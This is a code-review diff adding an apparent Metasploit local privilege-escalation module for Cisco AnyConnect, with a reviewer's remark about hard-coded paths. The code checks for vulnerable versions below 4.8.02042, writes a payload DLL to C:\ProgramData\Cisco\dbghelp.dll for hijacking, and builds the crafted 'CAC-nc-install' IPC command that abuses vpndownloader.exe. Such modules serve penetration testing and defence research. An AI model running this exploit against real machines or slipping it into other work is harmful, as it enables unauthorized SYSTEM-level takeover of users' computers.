modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb

```diff
@@ -0,0 +1,213 @@
+    endian :big
+
+    uint8   :msg_type,   label: 'Type'
+    uint8   :msg_index,  label: 'Index'
+    uint16  :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
+    stringz :msg_value,  label: 'Value', length: -> { msg_length }
+  end
+
+  class CIPCMessage < BinData::Record
+    endian :little
+
+    cipc_header :header, label: 'Header'
+    array :body, label: 'Body', type: :cipc_tlv, read_until: :eof
+  end
+
+  def check
+    file_path = nil
+    path = 'Cisco\\Cisco AnyConnect Secure Mobility Client'
+    [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
+      if file_exist?([pf_path, path, 'vpndownloader.exe'].join('\\'))
+        @installation_path = "#{pf_path}\\#{path}"
+        file_path = "#{@installation_path}\\vpndownloader.exe"
+        break
+      end
+    end
+
+    if file_path
+      vprint_status("Found vpndownloader.exe path: '#{file_path}'")
+      version = file_version(file_path)
+      if version
+        patched_version = Gem::Version.new('4.8.02042')
+        @ac_version    = Gem::Version.new(version.join('.'))
+        if @ac_version < patched_version
+          vprint_good("Cisco AnyConnect version #{@ac_version} appears to be vulnerable")
+          return CheckCode::Appears
+        else
+          vprint_error("Cisco AnyConnect version #{@ac_version} is not vulnerable")
+          return CheckCode::Safe
+        end
+      else
+        vprint_warning('Unable to retrieve vpndownloader.exe file version')
+      end
+    else
+      vprint_warning('vpndownloader.exe not found on the file system')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+
+    if check == CheckCode::Safe
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    cac_cmd = '"CAC-nc-install'
+    if @ac_version && @ac_version >= Gem::Version.new('4.7')
+      vprint_status('"-ipc" argument needed')
+      cac_cmd << "\t-ipc=#{rand_text_numeric(4)}"
+    else
+      vprint_status('"-ipc" argument not needed')
+    end
+
+    dbghelp_path = 'C:\\ProgramData\\Cisco\\dbghelp.dll'
+    print_status("Writing the payload to #{dbghelp_path}")
+
+    begin
+      payload_dll = generate_payload_dll(dll_exitprocess: true)
+      write_file(dbghelp_path, payload_dll)
+      register_file_for_cleanup(dbghelp_path)
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::NotFound, e.message)
+    end
+
+    # vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
+    # normal process will copy the file to
+    # "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
+    register_file_for_cleanup("C:\\ProgramData\\Cisco\\vpndownloader.exe")
```

Comment:
Perhaps use environment variables rather than, or in addition to, hard-coded paths?